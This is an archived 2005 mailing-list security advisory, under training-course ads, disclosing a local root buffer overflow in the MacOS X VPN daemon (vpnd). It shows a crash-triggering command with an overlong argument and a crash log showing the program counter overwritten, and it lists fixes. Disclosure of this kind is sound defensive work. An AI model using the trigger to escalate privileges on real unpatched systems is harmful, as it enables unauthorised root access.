Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security VulnWatch
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[VulnWatch] Local root vuln in VPN daemon on MacOS X

from [Pieter de Boer] Network Security [Permanent Link]
Subject: [VulnWatch] Local root vuln in VPN daemon on MacOS X
Date: Wed, 04 May 2005 16:09:41 +0200 
Local root vulnerability in vpnd on MacOS X <= 10.3.9
-----------------------------------------------------

Overview
--------

There exists a local root exploitable stack based buffer overflow in the
VPN daemon shipping with MacOS X. This bug can be easily exploited to
gain root access. Proof of concept code isn't provided since it's too
trivial.
This vulnerability has CVE ID CAN-2005-1343.


Exploitation
------------

The overflow can only be exploited on a system having vpnd configured as
a server. The following shows a NON-exploitable vpnd installation:

host:/tmp root# vpnd -i bla
2005-05-04 15:12:54 CEST        VPND: could not get servers dictionary
2005-05-04 15:12:54 CEST        VPND: error processing prefs file

This is due to the non-existance of
/var/db/SystemConfiguration/com.apple.RemoteAccessServers.plist.


Anyway, on an exploitable system you'd get:

host:/tmp root# vpnd -i `perl -e 'print "A"x600'`
2005-05-04 15:16:41 CEST        VPND: Server ID 'AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
invalid
Segmentation fault


/Library/Logs/CrashReporter/vpnd.crash.log shows:

OS Version:     10.3.7 (Build 7S215)
Report Version: 2

Command: vpnd
Path:    /usr/sbin/vpnd
Version: ??? (???)
PID:     12690
Thread:  0

Exception:  EXC_BAD_ACCESS (0x0001)
Codes:      KERN_INVALID_ADDRESS (0x0001) at 0x41414140

Thread 0 Crashed:

PPC Thread State:
  srr0: 0x41414140 srr1: 0x4200f030                vrsave: 0x00000000
    cr: 0x24000242  xer: 0x00000004   lr: 0x41414141  ctr: 0x900010a0
    r0: 0x41414141   r1: 0xbffffbf0   r2: 0xa0192b50   r3: 0xffffffff
    r4: 0x00300950   r5: 0x00402004   r6: 0x00402004   r7: 0x00000001
    r8: 0x0000000f   r9: 0xa00011ac  r10: 0x00000013  r11: 0x44000244
   r12: 0x900010a0  r13: 0x00000000  r14: 0x00000000  r15: 0x00000000
   r16: 0x00000000  r17: 0x00000000  r18: 0x00000000  r19: 0x00000000
   r20: 0x00000000  r21: 0x00000000  r22: 0x00000000  r23: 0x00000000
   r24: 0x00000000  r25: 0x00000000  r26: 0xbffffce4  r27: 0x00000014
   r28: 0x41414141  r29: 0x41414141  r30: 0x41414141  r31: 0x41414141

So it's clearly quite exploitable.


Fix
---

Apply Security Update 2005-005 (which fixes quite a few other bugs,
too), remove the suid bit or remove the above mentioned config file.
More information about said security update can be found at:
http://docs.info.apple.com/article.html?artnum=301528
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [VulnWatch] Local root vuln in VPN daemon on MacOS X, Pieter de Boer <=
Previous by Date:  [Full-disclosure] Local root vuln in VPN daemon on MacOS X, Pieter de Boer
Next by Date:  RE: [Full-disclosure] Re: [VulnWatch] Hotmail Advisories, Luis A. Cortes Zavala
Previous by Thread:  [Full-disclosure] Local root vuln in VPN daemon on MacOS X, Pieter de Boer
Next by Thread:  [VulnWatch] leafnode security announcement leafnode-SA-2005-01, Matthias Andree
Indexes:  [Date] [Thread] [Top] [All Lists]